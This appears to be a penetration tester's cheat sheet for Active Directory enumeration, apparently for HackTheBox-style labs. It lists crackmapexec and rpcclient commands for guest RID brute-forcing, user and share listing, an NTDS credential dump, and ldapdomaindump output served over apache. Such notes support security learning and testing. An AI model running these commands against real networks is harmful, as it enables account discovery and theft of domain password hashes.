Enum

Unauthenticated

// enumerate all Windows machines in a network segment
crackmapexec smb <ip/24>
// Enumerate users by brute-forcing RIDs over an anonymous (guest) login

crackmapexec smb <manager.htb | ip > -u 'guest' -p '' --rid-brute
// enum users 

crackmapexec smb  <ip>  --users
// dump NTDS with crackmapexec

crackmapexec smb  <ip> -u '<user>' -p '<password>' --ntds
// enum DC users via RPC
rpcclient -U "<dc-name>\<user>%<password>" <dc-ip> -c "enumdomusers"

Authenticated

// enum shares

crackmapexec smb  <ip> -u '<user>' -p '<password>' --shares
// enum DC users via RPC and get username and description

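# List domain users over RPC, then print each user's name and description.
# Replace the <dc-name>, <user>, <password> and <dc-ip> placeholders before running.
# The password is passed on the command line, so it is visible in process
# listings and shell history for as long as rpcclient runs.
# The grep/tr stage keeps only the bracketed tokens containing a hex RID from the
# enumdomusers output; reading them line by line avoids word-splitting and
# globbing surprises, and the RID is quoted when handed to queryuser.
rpcclient -U "<dc-name>\<user>%<password>" <dc-ip> -c "enumdomusers" \
  | grep -oP '\[.*?\]' | grep '0x' | tr -d '[]' \
  | while IFS= read -r rid; do
      # printf instead of echo -e: portable, and the RID is never treated as a format string.
      printf '\n[+] Getting info for RID %s:\n\n' "$rid"
      rpcclient -U "<dc-name>\<user>%<password>" <dc-ip> -c "queryuser $rid" \
        | grep -E -i "user name|description"
    done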
// enum user via LDAP
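# Write an LDAP domain dump into the local web root and serve it with apache.
# Abort if the web root is missing rather than dumping into the current directory.
cd /var/www/html || exit 1
service apache2 start
# The password is given on the command line; it is visible in process listings
# and shell history while the command runs.
python3 ldapdomaindump.py -u "<dc-name>\<user>" -p "<password>" <dc-ip>
# NOTE: files under /var/www/html are served on whatever interfaces apache is
# bound to, which is usually not only localhost, so the dumped domain data is
# reachable by any client that can hit this host's port 80; delete it when done.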
// open localhost:80 in a browser to view the dumped information.
